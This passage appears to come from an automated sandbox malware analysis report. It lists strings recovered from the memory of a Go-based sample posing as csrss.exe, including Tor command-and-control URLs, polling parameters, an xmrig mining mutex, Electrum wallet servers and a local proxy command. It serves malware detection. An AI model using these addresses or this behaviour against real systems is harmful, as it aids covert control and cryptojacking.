statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581erver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionPUser-Agent: Go-http-client/1.1
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Fserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
        Source: csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: COMPUTERNAME=computerNUMBER_OF_PROCESSORS=16PROCESSOR_REVISION=9e0dPUBLIC=C:\Users\PublicSystemRoot=C:\WindowsC:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466xeSELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exechallenge=e5ec22ece8aaafba&country_code=US&uuid=ec87b504-92ea-4d22-a937-161700799581server5.duniadekho.bar
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPpuSomC.exeHKEY_USERS\S-1-5-21-3425316567-2969588382-3778222414-1001\Software\Microsoft\e4d2c4f7nnHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exe
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.msc
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.exenhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.batstAppC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.cmdd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbsd2c4f7http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.js4d2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.jsed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wshd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.mscd2c4f7APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roamingt\e4d2c4f7LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local4d2c4f7PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel7PROCESSOR_LEVEL=6TEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\WindowsZES_ENABLE_SYSMAN=1LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common Files
        Source: csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: 